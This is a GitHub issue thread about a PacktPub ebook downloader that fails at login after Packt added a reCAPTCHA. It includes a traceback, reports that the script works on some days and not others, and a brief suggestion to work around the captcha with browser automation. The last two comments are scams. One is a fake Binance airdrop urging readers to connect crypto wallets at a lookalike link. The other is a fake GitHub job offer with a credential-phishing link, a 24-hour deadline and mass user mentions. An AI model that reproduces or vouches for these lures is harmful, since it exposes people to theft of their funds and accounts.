### ISSUE TITLE
Broken login

### ISSUE THREAD

**Issue by SirMikeDouglas** [lmbringas/packtpub-downloader#26]
Looks like PaktPub changed their login code. The script now fails on login. I noticed the website also doesn't have a "claim now" button, just an "Access Now" button.

**Comment by lmbringas** [comment]
Hey, yes, now PacktPub has a captcha so this script won't work. Sorry, it was fun while it lasted.

**Comment by ckykenken** [comment]
Luckily. Packt has just unlocked all claimed items from free learning available to download as epub, mobi and pdf formats. Your code has been caught by Packt and so they changed their code

**Comment by SirMikeDouglas** [comment]
RE: it was fun while it lasted
Yes it was, kudos on the good work.

RE:  login has a captcha so this script won't work
Web automation maybe? Launch a browser, login manually, automate away....just a thought. :)

**Comment by ckykenken** [comment]
Bad news, Packt has just 'fixed' their bug. The free learning is no longer available to download as offline formats

**Comment by ckykenken** [comment]
Good news: the downloader is working again!

**Comment by Reiner030** [comment]
sadly not today for me but thanks
> it was fun while it lasted

````
Error login,  check user and password
Traceback (most recent call last):
  File "packtpub-downloader-async/main.py", line 403, in <module>
    main(sys.argv[1:])
  File "packtpub-downloader-async/main.py", line 388, in main
    user = User(email, password, quiet)
  File "/home/reiner/packtpub-downloader-async/user.py", line 25, in __init__
    self.header["Authorization"] = self.get_token(self.quiet)
  File "/home/reiner/packtpub-downloader-async/user.py", line 41, in get_token
    print("Error {}".format(e))
NameError: name 'e' is not defined
````

**Comment by ckykenken** [comment]
Probably the anti-not measure has been fixed by Packt. RIP.

**Comment by blackout314** [comment]
me too, but strange thing.. on my mac works, on my rpi not

**Comment by vancha** [comment]
as of the 25th of februari 2020, I have just tested this script, and it seems to work fine. It's downloading all date in all formats right now(maybe you've fixed in in the meantime?) for passwords containing special characters just make sure you use single quotes, as in -p 'P@ssWord!1', otherwise it won't be escaped properly :)

**Comment by realPilotfish** [comment]
One day it works, another day ist does not.

I added a print statement to see what the auth gets back.
When it does not work, the reason for this seems to be a missing captcha answer:
`{'message': 'The recaptcha solution is missing.', 'errorCode': 7000035, 'errorId': '7b79509d-b03c-4d29-ae32-20f3ed7dc6b2'}`

Some time later, the same call works just fine and the downloader manages to pull all the missing content.

**Comment by PrecisioConsulting** [comment]
### Join Binance Arbitrage in Celebrating 2023: Divide Up to 600,000 BNB in Rewards! 

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance arbitrage smart contract. Use the smart contract to trade your ETH to BNB, and it generates an extra 10%~12% BNB as your profit, which we committed to a total of 600,000 BNB.

The currently online smart contracts are applicable to Trust wallet, Atomic wallet, and ZenGo wallet

To start the Arbitrage smart contract, please follow the steps below: [Binance Rewards](http://go.bnbrewards.online/WvDubR)


[![Claim Now](https://public.bnbstatic.com/image/cms/article/body/202303/44b0b95a5bef2cc2479d683bfbbdf8ba.png)](http://go.bnbrewards.online/WvDubR)

### Secure Your BNB with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Binance](http://go.bnbrewards.online/WvDubR).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility  Airdrop](http://go.bnbrewards.online/WvDubR).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

**Comment by raviikushh** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
jeeo, @Sari1975, @cooperjm, @yichiehliu, @bizk, @thamthee, @rusty-reebs, @AymaneZizi, @keshavsain603, @khanwali225, @arberx, @spandan114, @tibi77, @devanshbatham, @arajajyothibabu, @Pawan0908, @lynx1902, @mahmoudabuelnaga, @mmarat01, @foreman3890
